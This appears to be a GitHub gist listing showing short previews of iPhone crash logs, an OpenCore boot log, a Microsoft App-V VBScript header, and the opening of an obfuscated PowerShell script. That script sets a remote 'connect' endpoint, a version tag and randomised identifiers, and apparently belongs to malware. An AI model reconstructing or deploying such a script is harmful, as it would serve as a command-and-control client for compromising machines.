This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{"blame":[],"app_name":"videosubscriptionsd","timestamp":"2019-01-13 16:42:07.48 -0500","app_version":"","slice_uuid":"4393dd09-05a7-3139-8605-28464675670a","build_version":"","share_with_app_devs":false,"is_first_party":true,"bug_type":"109","os_version":"iPhone OS 11.3.1 (15E302)","incident_id":"43BCA17D-8E8F-47B6-9C1D-6189245A1F04","name":"videosubscriptionsd","symbolicated":true} | |
Incident Identifier: 43BCA17D-8E8F-47B6-9C1D-6189245A1F04 | |
CrashReporter Key: df6f305b007c27621076dc48097efae6dad141b9 | |
Hardware Model: iPhone9,2 | |
Process: videosubscriptionsd [196] | |
Path: /usr/libexec/videosubscriptionsd | |
Identifier: videosubscriptionsd | |
Version: ??? | |
Code Type: ARM-64 (Native) | |
Role: Unspecified |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{"blame":[],"app_name":"videosubscriptionsd","timestamp":"2019-01-13 16:42:06.48 -0500","app_version":"","slice_uuid":"4393dd09-05a7-3139-8605-28464675670a","build_version":"","share_with_app_devs":false,"is_first_party":true,"bug_type":"109","os_version":"iPhone OS 11.3.1 (15E302)","incident_id":"9306C21D-863D-4D67-9F60-32A586452EAD","name":"videosubscriptionsd","symbolicated":true} | |
Incident Identifier: 9306C21D-863D-4D67-9F60-32A586452EAD | |
CrashReporter Key: df6f305b007c27621076dc48097efae6dad141b9 | |
Hardware Model: iPhone9,2 | |
Process: videosubscriptionsd [163] | |
Path: /usr/libexec/videosubscriptionsd | |
Identifier: videosubscriptionsd | |
Version: ??? | |
Code Type: ARM-64 (Native) | |
Role: Unspecified |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{"blame":[],"app_name":"videosubscriptionsd","timestamp":"2019-01-13 16:41:54.79 -0500","app_version":"","slice_uuid":"4393dd09-05a7-3139-8605-28464675670a","build_version":"","share_with_app_devs":false,"is_first_party":true,"bug_type":"109","os_version":"iPhone OS 11.3.1 (15E302)","incident_id":"843E10BD-F46C-4C44-BE15-EF232866A916","name":"videosubscriptionsd","symbolicated":true} | |
Incident Identifier: 843E10BD-F46C-4C44-BE15-EF232866A916 | |
CrashReporter Key: df6f305b007c27621076dc48097efae6dad141b9 | |
Hardware Model: iPhone9,2 | |
Process: videosubscriptionsd [161] | |
Path: /usr/libexec/videosubscriptionsd | |
Identifier: videosubscriptionsd | |
Version: ??? | |
Code Type: ARM-64 (Native) | |
Role: Unspecified |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
00:000 00:000 OC: OpenCore is now loading (Vault: 0/0, Sign 0/0)... | |
00:008 00:008 OC: Boot timestamp - 2019.09.10 04:25:09 | |
00:015 00:007 OCCPU: Found Intel(R) Core(TM) i7-7700K CPU @ 4.20GHz | |
00:023 00:007 OCCPU: Signature 906E9 Stepping 9 Model 9E Family 6 Type 0 ExtModel 9 ExtFamily 0 | |
00:032 00:009 OCCPU: Detected Apple Processor Type: 07 -> 0705 | |
00:040 00:007 OCCPU: Ratio Min 8 Max 42 Current 48 Turbo 48 48 48 48 | |
00:048 00:007 OCCPU: Known Model Core Crystal Clock Frequency 24000000Hz | |
00:056 00:007 OCCPU: TSC Adjust 0 | |
00:063 00:007 OCCPU: CPUFrequencyFromART 4200000000Hz 4200MHz = 24000000 * 350 / 2 | |
00:071 00:007 OCCPU: Timer address is 1808 from PMC ACPI |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Date: 12/21/19, 12:06 AM | |
Process: GSSCred | |
Bundle id: (null) | |
Device: iPhone 7 Plus, iOS 13.3 | |
Exception type: EXC_BREAKPOINT | |
Exception subtype: 0x209830808 | |
Exception codes: 0x0000000000000001, 0x0000000209830808 | |
Culprit: Unknown | |
Triggered by thread: 0 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Incident Identifier: D9AB682C-D4FE-47B8-8F1F-B82C2218EFB2 | |
CrashReporter Key: 5f330031901a147f398b03e399f12c01f5305b0e | |
Hardware Model: iPhone9,2 | |
Process: SpringBoard [1683] | |
Path: /System/Library/CoreServices/SpringBoard.app/SpringBoard | |
Identifier: com.apple.springboard | |
Version: 50 (1.0) | |
Code Type: ARM-64 (Native) | |
Role: Foreground | |
Parent Process: launchd [1] |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$scriptItem = Get-Item -Path $MyInvocation.MyCommand.Path; | |
$OS_Major = [System.Environment]::OSVersion.Version.Major.ToString() + "." + [System.Environment]::OSVersion.Version.Minor.ToString(); | |
$EndPointURL = "http://api.private-chatting.com/connect"; | |
$__Version__ = "M_37"; | |
[string]$WorkerEnHandle = [Guid]::NewGuid().ToString(); | |
[System.Threading.EventWaitHandle]$WorkerEn = [System.Threading.EventWaitHandle]::new($true, [System.Threading.EventResetMode]::ManualReset, $WorkerEnHandle); | |
function XF3a8JO3r5r8G([string] $str) { | |
return [System.Environment]::ExpandEnvironmentVariables("%" + $str + "%") | |
} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
'--------------------------------------------------------------------------------------------- | |
' Copyright: Microsoft Corp. | |
' | |
' This script is designed to be used only for scheduled tasks(s). | |
' There is no extensive error check, and will not dump the output from the Powershell CmdLet. | |
' | |
' Usage: SyncAppvPublishingServer {cmdline-args(passthrough to cmdlet)} | |
'--------------------------------------------------------------------------------------------- | |
Option Explicit |
OlderNewer